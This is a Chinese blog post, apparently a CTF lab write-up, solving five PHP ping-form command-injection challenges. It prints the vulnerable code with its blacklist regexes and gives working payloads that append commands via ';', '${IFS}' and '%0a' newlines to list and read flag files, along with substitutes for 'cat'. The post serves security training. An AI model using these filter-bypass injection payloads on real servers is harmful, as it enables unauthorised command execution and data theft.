RCE绕过靶场练习

已于 2023-03-26 14:44:55 修改
阅读量894 收藏 1
点赞数 1
分类专栏: # web安全 文章标签: 网络
于 2022-12-15 16:26:18 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_63701832/article/details/128330486
版权

目录

CTF-01

CTF-02

CTF-03

CTF-04

CTF-05

CTF-01

测试回显

Array
(
    [0] => PING 127.0.0.1 (127.0.0.1): 56 data bytes
    [1] => 64 bytes from 127.0.0.1: seq=0 ttl=42 time=0.028 ms
    [2] => 64 bytes from 127.0.0.1: seq=1 ttl=42 time=0.059 ms
    [3] => 64 bytes from 127.0.0.1: seq=2 ttl=42 time=0.065 ms
    [4] => 64 bytes from 127.0.0.1: seq=3 ttl=42 time=0.060 ms
    [5] => 
    [6] => --- 127.0.0.1 ping statistics ---
    [7] => 4 packets transmitted, 4 packets received, 0% packet loss
    [8] => round-trip min/avg/max = 0.028/0.053/0.065 ms
)

?ip=127.0.0.1;ls

Array
(
    [0] => PING 127.0.0.1 (127.0.0.1): 56 data bytes
    [1] => 64 bytes from 127.0.0.1: seq=0 ttl=42 time=0.040 ms
    [2] => 64 bytes from 127.0.0.1: seq=1 ttl=42 time=0.058 ms
    [3] => 64 bytes from 127.0.0.1: seq=2 ttl=42 time=0.063 ms
    [4] => 64 bytes from 127.0.0.1: seq=3 ttl=42 time=0.068 ms
    [5] => 
    [6] => --- 127.0.0.1 ping statistics ---
    [7] => 4 packets transmitted, 4 packets received, 0% packet loss
    [8] => round-trip min/avg/max = 0.040/0.057/0.068 ms
    [9] => 858195988072.php
    [10] => index.php
)

?ip=127.0.0.1;cat 858195988072.php|base64

解码拿到flag

CTF-02

<?php

$res = FALSE;

if (isset($_GET['ip']) && $_GET['ip']) {
    $ip = $_GET['ip'];
    $m = [];
    if (!preg_match_all("/cat/", $ip, $m)) {
        $cmd = "ping -c 4 {$ip}";
        exec($cmd, $res);
    } else {
        $res = $m;
    }
}
?>

cat更多绕过如下

cat 由第一行开始显示内容,并将所有内容输出
tac 从最后一行倒序显示内容,并将所有内容输出
more 根据窗口大小,一页一页的现实文件内容
less more 类似,但其优点可以往前翻页,而且可以搜索字符
head 只显示头几行
tail 只显示最后几行
nl 类似于 cat -n ,显示时输出行号

CTF-03

<?php

$res = FALSE;

if (isset($_GET['ip']) && $_GET['ip']) {
    $ip = $_GET['ip'];
    $m = [];
    if (!preg_match_all("/ /", $ip, $m)) {
        $cmd = "ping -c 4 {$ip}";
        exec($cmd, $res);
    } else {
        $res = $m;
    }
}
?>

空格绕过如下

IFS$9 %09 < > <> {,} %20 ${IFS}

127.0.0.1;cat${IFS}flag_26686108321431.php|base64

CTF-04

本题过滤目录分隔符

127.0.0.1;ls flag_is_here

[9] => flag_45342181814693.php

127.0.0.1;cd flag_is_here;cat flag_45342181814693.php|base64

CTF-05

  if (!preg_match_all("/(\||&|;| |\/|cat|flag|ctfhub)/", $ip, $m)) {
        $cmd = "ping -c 4 {$ip}";
        exec($cmd, $res);
    } 

%0a:回车

%0d:换行

payload 绕过

?ip=127.0.0.1%0acd${IFS}f***_is_here%0aless${IFS}f***_1791377478478.php

coleak
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
前端验证码绕过 靶场实战
weixin_54771278的博客
06-08 1294
实验介绍 1. 验证码前端可获取 (1)验证码隐藏在源码之中 验证这种情况很简单,我们只需要记住验证码,然后右键打开网站源代码,CtrI+F搜索,输入刚才的验证码,如果可以成功匹配到 (2)验证码隐藏在Cookie中 一般来说,我们会把验证码的值用Session存储起来,通过对比用户提交的验证码和Session中的验证码,就可以知道输入是否正确。由于Session会占用服务器资源,有的开发人员会把验证码的值加密后存储在Cookie中。 (3)仅在客户端生成验证码 有的网站验证码由本地js生成仅仅..
ctf php侧漏,ctf中常见php rce绕过总结
weixin_39723010的博客
03-16 1663
php webshell的研究只是总结一些常见的姿势,大佬轻喷无字母的情况一个经典的示例if(!preg_match('/[a-z0-9]/is',$_GET['shell'])) {eval($_GET['shell']);}在eval中执行,相当于用传入内容创建了一个新的php文件,也就是说= 这些也是可以用的在没有字母的情况下,php5可以通过$_($__);这个$_,会被php按照call...
RCE漏洞之绕过
h0ld1rs的博客
10-27 5786
文章目录花括号斜杠空格过滤一些命令分隔符黑名单绕过拼接绕过编码绕过单引号和双引号绕过利用Shell 特殊变量绕过linux中直接查看文件内容的工具文件构造 花括号 {} 在Linux bash中还可以使用{OS_COMMAND,ARGUMENT}来执行系统命令 {cat,flag} 斜杠 路径 / \是在正则等语法里面,表示后面跟的字符是正常字符,不需要转义。 也就意味着,我们可以在rce漏洞,过滤掉cat ls等命令时候,直接使用ca\t来实现绕过 空格过滤 < 、<>、%20(spac
RCE漏洞及其绕过——[SWPUCTF 2021 新生赛]easyrce、caidao、babyrce
最新发布
2401_82985722的博客
04-19 1176
(参考)Shell是一个程序,它在用户和操作系统之间提供了一个面向行的可交互接口。用户在命令行中输入命令,运行在后台的shell把命令转换成指令码发给操作系统。远程代码执行漏洞远程命令执行漏洞。
ctf中常见php rce绕过总结
2302_76827504的博客
04-28 2042
只是总结一些常见的姿势,大佬轻喷。
pikachu 靶场 RCE
lee_maple的博客
11-19 2953
RCE(remote command/code execute)概述 RCE漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。 远程系统命令执行 一般出现这种漏洞,是因为应用系统从设计上需要给用户提供指定的远程命令操作的接口 比如我们常见的路由器、防火墙、入侵检测等设备的web管理界面上 一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测试,并返回测试结果。 而,如果,设计者在完成该功能时,没有做严格的
异或脚本rce题目绕过正则表达式必备
12-28
字符串转换成异或型,用于rce绕过正则表达式
rce:Resilia编码练习
02-17
ceResilia编码练习指示构建一个简单的应用程序,以在网页上显示通知列表。 通知的有效负载是任意的(根据您对我们客户的了解选择一个简单的域),但是允许其用作通知的属性应该是有意义的。 这样做的目的不是花费...
log4j2-rce靶场.zip
01-16
靶场,是指为信息安全人员提供实战演练、渗透测试和攻防对抗等训练环境的虚拟或实体场地。在不同的领域中,靶场扮演着重要的角色,尤其是在网络安全领域,靶场成为培养和提高安全专业人员技能的重要平台。 首先,...
CVE-2021-22192 靶场: 未授权用户 RCE 漏洞.zip
01-14
靶场,是指为信息安全人员提供实战演练、渗透测试和攻防对抗等训练环境的虚拟或实体场地。在不同的领域中,靶场扮演着重要的角色,尤其是在网络安全领域,靶场成为培养和提高安全专业人员技能的重要平台。 首先,...
sangfor EDR RCE
03-29
# Sangfor EDR RCE 影响版本: - EDR v3.2.16 - EDR v3.2.17 - EDR v3.2.19 exp: ``` python poc.py url http://10.10.10.0/ ```
RCE通配符绕过
m0_56059226的博客
08-27 800
RCE的时候除了异或取反等方法,才学了一种新的绕过姿势,就是通配符 在这之前可以先看看什么是通配符Linux通配符的使用_Linux教程_Linux公社-Linux系统门户网站 (linuxidc.com) 谈谈CTF中常见情况吧,当字母数字或者一些特殊的字符被过滤掉时,不能直接传入,就可以考虑用通配符进行绕过,先看一张图片 ?代表的是匹配一个字符,这样的话他就会匹配所有成立情况对/home/kali/ex11进行操作,自然也包括了/bin/cat /home/kali/ex11,因为cat等一.
由[极客大挑战 2019]RCE ME总结disable_functions绕过
車鈊的博客
06-06 450
由[极客大挑战 2019]RCE ME总结disable_functions绕过 源代码 <?php error_reporting(0); if(isset($_GET['code'])){ $code=$_GET['code']; if(strlen($code)>40){ die("This is too Long."); } if(preg_match("/[A-Za-z0-9]+/",$code)){
RCE远程命令执行之 pikachu 靶场练习
Goodric的博客
02-14 681
RCE远程命令执行 RCE(remote command/code execute ,远程命令执行) 可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。 前面对rce 的一些基础知识进行学习:RCE学习 下面通过 pikachu 靶场rce 漏洞的两种形式进行测试。 exec“ping” 远程系统命令执行 后台对用户输入的IP地址进行一次 ping 测试,并返回测试结果。 尝试 ping 一下本地127.0.0.1 可以看到 ping 成功了。 不过这里存在乱码,靶场是放在 W
Linux下RCE绕过空格限制
weixin_44971601的博客
09-29 1164
Linux下RCE绕过空格限制
CTFHUB-RCE通关记录以及常见的绕过过滤的方法
不想当脚本小子的脚本小子
03-21 2146
先过关,再分析相关的防御源代码 1.过滤cat 然后cat 301472130920273.php然后查看网页源代码即可得到flag 2.过滤cat 根据题目要求过滤了cat 而该服务器为Linux系统区分大小写 就无法通过大小写来绕过 本来想使用vi命令替换cat命令也能查看到flag中的内容 但是失败了 最后用了替换法:127.0.0.0 ; $a=ca;$b=t; $a$b flagxxxx 题目源码: <?php $res = FALSE; if (is.
RCE(远程命令执行)绕过总结
Elite的博客
04-18 3464
常见的RCE(远程命令执行)漏洞绕过方法,及原理讲解,干货满满!
CTF——远程代码执行漏洞的利用与绕过
weixin_51735061的博客
03-10 4524
CTF——远程代码执行漏洞的利用与绕过 RCE远程代码执行是一种常见的攻击方法,通过一些特定的函数方法来达到远程执行漏洞。比如说PHP的system,exec,shell_exec,nodejs的eval等。开发者不小心将这些函数公开出来以实现某种服务,而用户的数据不施加任何的过滤的话就很容易形成此漏洞。 敏感函数 系统指令执行的敏感函数 system()、exec()、shell_exec()、passthru()、pctnl_exec()、 popen()、proc_open() 能够进行代码注入的敏
RCE漏洞详解及绕过总结(全面)
热门推荐
永不落的梦想
07-10 1万+
包括RCE漏洞的原理,常见的造成RCE漏洞的函数解析,以及限制绕过的各种姿势
pikachu rce靶场
07-25
很抱歉,我无法回答关于"Pikachu RCE靶场"的问题。因为在提供的引用内容中,并没有提到与"Pikachu RCE靶场"相关的信息。如果您有其他问题,我将很乐意为您提供帮助。 #### 引用[.reference_title] - *1* *3* [Pikachu靶场-RCE](https://blog.csdn.net/weixin_48899364/article/details/128485444)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [Pikachu靶场RCE漏洞详解](https://blog.csdn.net/m0_46467017/article/details/124838779)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

coleak

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值